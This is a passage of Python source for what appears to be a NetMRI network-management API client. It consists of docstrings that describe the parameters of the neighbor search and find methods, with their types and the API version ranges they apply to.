| ``required:`` False
| ``default:`` None
:param LLDPInd: A flag indicating that this neighbor relationship was derived based upon the source device's LLDP entries.
:type LLDPInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param LLDPNeighborID: The internal NetMRI identifier for this LLDP table entry.
:type LLDPNeighborID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param LLDPNeighborID: The internal NetMRI identifier for this LLDP table entry.
:type LLDPNeighborID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param LocalRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a local route.
:type LocalRoutedInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param LocalRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a local route.
:type LocalRoutedInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborChangedCols: The fields that changed between this revision of the record and the previous revision.
:type NeighborChangedCols: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborChangedCols: The fields that changed between this revision of the record and the previous revision.
:type NeighborChangedCols: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborDeviceID: The internal NetMRI identifier for the destination device in this neighbor relationship.
:type NeighborDeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborDeviceID: The internal NetMRI identifier for the destination device in this neighbor relationship.
:type NeighborDeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type NeighborEndTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type NeighborEndTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborFirstSeenTime: The date and time this neighbor was first seen on the network, and since which it has been continuously present.
:type NeighborFirstSeenTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborFirstSeenTime: The date and time this neighbor was first seen on the network, and since which it has been continuously present.
:type NeighborFirstSeenTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborIfIndex: The SNMP interface index of the destination device interface.
:type NeighborIfIndex: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborIfIndex: The SNMP interface index of the destination device interface.
:type NeighborIfIndex: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborInterfaceID: The internal NetMRI identifier for the destination interface in this neighbor relationship.
:type NeighborInterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborInterfaceID: The internal NetMRI identifier for the destination interface in this neighbor relationship.
:type NeighborInterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborNetworkDeviceInd: A flag indicating if the destination device is a network device or an end host.
:type NeighborNetworkDeviceInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborNetworkDeviceInd: A flag indicating if the destination device is a network device or an end host.
:type NeighborNetworkDeviceInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborStartTime: The starting effective time of this revision of the record.
:type NeighborStartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborStartTime: The starting effective time of this revision of the record.
:type NeighborStartTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborTimestamp: The date and time this record was collected or calculated.
:type NeighborTimestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborTimestamp: The date and time this record was collected or calculated.
:type NeighborTimestamp: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NetworkDeviceInd: A flag indicating if the source device is a network device or an end host.
:type NetworkDeviceInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkDeviceInd: A flag indicating if the source device is a network device or an end host.
:type NetworkDeviceInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param OSPFRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon an OSPF route.
:type OSPFRoutedInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param OSPFRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon an OSPF route.
:type OSPFRoutedInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ProtoRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a dynamic protocol defined route.
:type ProtoRoutedInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ProtoRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a dynamic protocol defined route.
:type ProtoRoutedInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RevSwitchFwdInd: A flag indicating that this neighbor relationship was derived by reversing a switch forwarding neighbor relationship.
:type RevSwitchFwdInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RevSwitchFwdInd: A flag indicating that this neighbor relationship was derived by reversing a switch forwarding neighbor relationship.
:type RevSwitchFwdInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param SerialInd: A flag indicating that this neighbor relationship was derived using the NetMRI point-to-point neighbor detection algorithm. Despite the name this may include point-to-point relationships on interfaces other than serial interfaces.
:type SerialInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param SerialInd: A flag indicating that this neighbor relationship was derived using the NetMRI point-to-point neighbor detection algorithm. Despite the name this may include point-to-point relationships on interfaces other than serial interfaces.
:type SerialInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StaticRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a static route.
:type StaticRoutedInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StaticRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a static route.
:type StaticRoutedInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param SwitchFwdInd: A flag indicating that this neighbor relationship was derived using the NetMRI switch forwarding neighbor detection algorithm.
:type SwitchFwdInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param SwitchFwdInd: A flag indicating that this neighbor relationship was derived using the NetMRI switch forwarding neighbor detection algorithm.
:type SwitchFwdInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifIndex: The SNMP interface index of the source device interface.
:type ifIndex: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifIndex: The SNMP interface index of the source device interface.
:type ifIndex: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the neighbors as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of neighbor methods. The listed methods will be called on each neighbor returned and included in the output. Available methods are: network_id, device, interface, neighbor_device, neighbor_interface, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device, interface, neighbor_device, neighbor_interface.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` NeighborID
:param sort: The data field(s) to use for sorting the output. Default is NeighborID. Valid values are DataSourceID, NeighborID, DeviceID, InterfaceID, ifIndex, NeighborDeviceID, NeighborInterfaceID, NeighborIfIndex, NeighborFirstSeenTime, NeighborStartTime, NeighborEndTime, NeighborChangedCols, NeighborTimestamp, CombinedInd, CDPInd, LLDPInd, SerialInd, SwitchFwdInd, RevSwitchFwdInd, DirectEthernetInd, IPRoutedInd, StaticRoutedInd, LocalRoutedInd, ProtoRoutedInd, BGPRoutedInd, OSPFRoutedInd, IGRPRoutedInd, NetworkDeviceInd, NeighborNetworkDeviceInd, CDPNeighborID, LLDPNeighborID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each Neighbor. Valid values are DataSourceID, NeighborID, DeviceID, InterfaceID, ifIndex, NeighborDeviceID, NeighborInterfaceID, NeighborIfIndex, NeighborFirstSeenTime, NeighborStartTime, NeighborEndTime, NeighborChangedCols, NeighborTimestamp, CombinedInd, CDPInd, LLDPInd, SerialInd, SwitchFwdInd, RevSwitchFwdInd, DirectEthernetInd, IPRoutedInd, StaticRoutedInd, LocalRoutedInd, ProtoRoutedInd, BGPRoutedInd, OSPFRoutedInd, IGRPRoutedInd, NetworkDeviceInd, NeighborNetworkDeviceInd, CDPNeighborID, LLDPNeighborID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against neighbors, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: BGPRoutedInd, CDPInd, CDPNeighborID, CombinedInd, DataSourceID, DeviceID, DirectEthernetInd, IGRPRoutedInd, IPRoutedInd, InterfaceID, LLDPInd, LLDPNeighborID, LocalRoutedInd, NeighborChangedCols, NeighborDeviceID, NeighborEndTime, NeighborFirstSeenTime, NeighborID, NeighborIfIndex, NeighborInterfaceID, NeighborNetworkDeviceInd, NeighborStartTime, NeighborTimestamp, NetworkDeviceInd, OSPFRoutedInd, ProtoRoutedInd, RevSwitchFwdInd, SerialInd, StaticRoutedInd, SwitchFwdInd, ifIndex.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return neighbors: An array of the Neighbor objects that match the specified input criteria.
:rtype neighbors: Array of Neighbor
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available neighbors matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: BGPRoutedInd, CDPInd, CDPNeighborID, CombinedInd, DataSourceID, DeviceID, DirectEthernetInd, IGRPRoutedInd, IPRoutedInd, InterfaceID, LLDPInd, LLDPNeighborID, LocalRoutedInd, NeighborChangedCols, NeighborDeviceID, NeighborEndTime, NeighborFirstSeenTime, NeighborID, NeighborIfIndex, NeighborInterfaceID, NeighborNetworkDeviceInd, NeighborStartTime, NeighborTimestamp, NetworkDeviceInd, OSPFRoutedInd, ProtoRoutedInd, RevSwitchFwdInd, SerialInd, StaticRoutedInd, SwitchFwdInd, ifIndex.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BGPRoutedInd: The operator to apply to the field BGPRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BGPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a BGP route. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BGPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BGPRoutedInd: If op_BGPRoutedInd is specified, the field named in this input will be compared to the value in BGPRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BGPRoutedInd must be specified if op_BGPRoutedInd is specified.
:type val_f_BGPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BGPRoutedInd: If op_BGPRoutedInd is specified, this value will be compared to the value in BGPRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BGPRoutedInd must be specified if op_BGPRoutedInd is specified.
:type val_c_BGPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CDPInd: The operator to apply to the field CDPInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CDPInd: A flag indicating that this neighbor relationship was derived based upon the source device's CDP entries. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CDPInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CDPInd: If op_CDPInd is specified, the field named in this input will be compared to the value in CDPInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CDPInd must be specified if op_CDPInd is specified.
:type val_f_CDPInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CDPInd: If op_CDPInd is specified, this value will be compared to the value in CDPInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CDPInd must be specified if op_CDPInd is specified.
:type val_c_CDPInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CDPNeighborID: The operator to apply to the field CDPNeighborID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CDPNeighborID: The internal NetMRI identifier for the CdpNeighbor object associated with this neighbor entry (if any). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CDPNeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CDPNeighborID: If op_CDPNeighborID is specified, the field named in this input will be compared to the value in CDPNeighborID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CDPNeighborID must be specified if op_CDPNeighborID is specified.
:type val_f_CDPNeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CDPNeighborID: If op_CDPNeighborID is specified, this value will be compared to the value in CDPNeighborID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CDPNeighborID must be specified if op_CDPNeighborID is specified.
:type val_c_CDPNeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_CombinedInd: The operator to apply to the field CombinedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. CombinedInd: A flag indicating that these devices have basic layer 1/2 connectivity. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_CombinedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_CombinedInd: If op_CombinedInd is specified, the field named in this input will be compared to the value in CombinedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_CombinedInd must be specified if op_CombinedInd is specified.
:type val_f_CombinedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_CombinedInd: If op_CombinedInd is specified, this value will be compared to the value in CombinedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_CombinedInd must be specified if op_CombinedInd is specified.
:type val_c_CombinedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the source device in this neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DirectEthernetInd: The operator to apply to the field DirectEthernetInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DirectEthernetInd: A flag indicating that this neighbor relationship was derived using the NetMRI direct Ethernet neighbor detection algorithm (for example, two routers directly connected via Ethernet, without any switches between them). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DirectEthernetInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DirectEthernetInd: If op_DirectEthernetInd is specified, the field named in this input will be compared to the value in DirectEthernetInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DirectEthernetInd must be specified if op_DirectEthernetInd is specified.
:type val_f_DirectEthernetInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DirectEthernetInd: If op_DirectEthernetInd is specified, this value will be compared to the value in DirectEthernetInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DirectEthernetInd must be specified if op_DirectEthernetInd is specified.
:type val_c_DirectEthernetInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IGRPRoutedInd: The operator to apply to the field IGRPRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IGRPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon an IGRP or EIGRP route. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IGRPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IGRPRoutedInd: If op_IGRPRoutedInd is specified, the field named in this input will be compared to the value in IGRPRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IGRPRoutedInd must be specified if op_IGRPRoutedInd is specified.
:type val_f_IGRPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IGRPRoutedInd: If op_IGRPRoutedInd is specified, this value will be compared to the value in IGRPRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IGRPRoutedInd must be specified if op_IGRPRoutedInd is specified.
:type val_c_IGRPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IPRoutedInd: The operator to apply to the field IPRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship; that is, the destination device is a next hop for at least one route on the source device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IPRoutedInd: If op_IPRoutedInd is specified, the field named in this input will be compared to the value in IPRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IPRoutedInd must be specified if op_IPRoutedInd is specified.
:type val_f_IPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IPRoutedInd: If op_IPRoutedInd is specified, this value will be compared to the value in IPRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IPRoutedInd must be specified if op_IPRoutedInd is specified.
:type val_c_IPRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InterfaceID: The operator to apply to the field InterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InterfaceID: The internal NetMRI identifier for the source interface in this neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InterfaceID: If op_InterfaceID is specified, the field named in this input will be compared to the value in InterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InterfaceID must be specified if op_InterfaceID is specified.
:type val_f_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InterfaceID: If op_InterfaceID is specified, this value will be compared to the value in InterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InterfaceID must be specified if op_InterfaceID is specified.
:type val_c_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_LLDPInd: The operator to apply to the field LLDPInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. LLDPInd: A flag indicating that this neighbor relationship was derived based upon the source device's LLDP entries. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_LLDPInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_LLDPInd: If op_LLDPInd is specified, the field named in this input will be compared to the value in LLDPInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_LLDPInd must be specified if op_LLDPInd is specified.
:type val_f_LLDPInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_LLDPInd: If op_LLDPInd is specified, this value will be compared to the value in LLDPInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_LLDPInd must be specified if op_LLDPInd is specified.
:type val_c_LLDPInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_LLDPNeighborID: The operator to apply to the field LLDPNeighborID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. LLDPNeighborID: The internal NetMRI identifier for this LLDP table entry. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_LLDPNeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_LLDPNeighborID: If op_LLDPNeighborID is specified, the field named in this input will be compared to the value in LLDPNeighborID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_LLDPNeighborID must be specified if op_LLDPNeighborID is specified.
:type val_f_LLDPNeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_LLDPNeighborID: If op_LLDPNeighborID is specified, this value will be compared to the value in LLDPNeighborID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_LLDPNeighborID must be specified if op_LLDPNeighborID is specified.
:type val_c_LLDPNeighborID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_LocalRoutedInd: The operator to apply to the field LocalRoutedInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. LocalRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a local route. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_LocalRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_LocalRoutedInd: If op_LocalRoutedInd is specified, the field named in this input will be compared to the value in LocalRoutedInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_LocalRoutedInd must be specified if op_LocalRoutedInd is specified.
:type val_f_LocalRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_LocalRoutedInd: If op_LocalRoutedInd is specified, this value will be compared to the value in LocalRoutedInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_LocalRoutedInd must be specified if op_LocalRoutedInd is specified.
:type val_c_LocalRoutedInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborChangedCols: The operator to apply to the field NeighborChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_NeighborChangedCols: If op_NeighborChangedCols is specified, the field named in this input will be compared to the value in NeighborChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_NeighborChangedCols must be specified if op_NeighborChangedCols is specified.
:type val_f_NeighborChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_NeighborChangedCols: If op_NeighborChangedCols is specified, this value will be compared to the value in NeighborChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_NeighborChangedCols must be specified if op_NeighborChangedCols is specified.
:type val_c_NeighborChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_NeighborDeviceID: The operator to apply to the field NeighborDeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. NeighborDeviceID: The internal NetMRI identifier for the destination device in this neighbor relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_NeighborDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
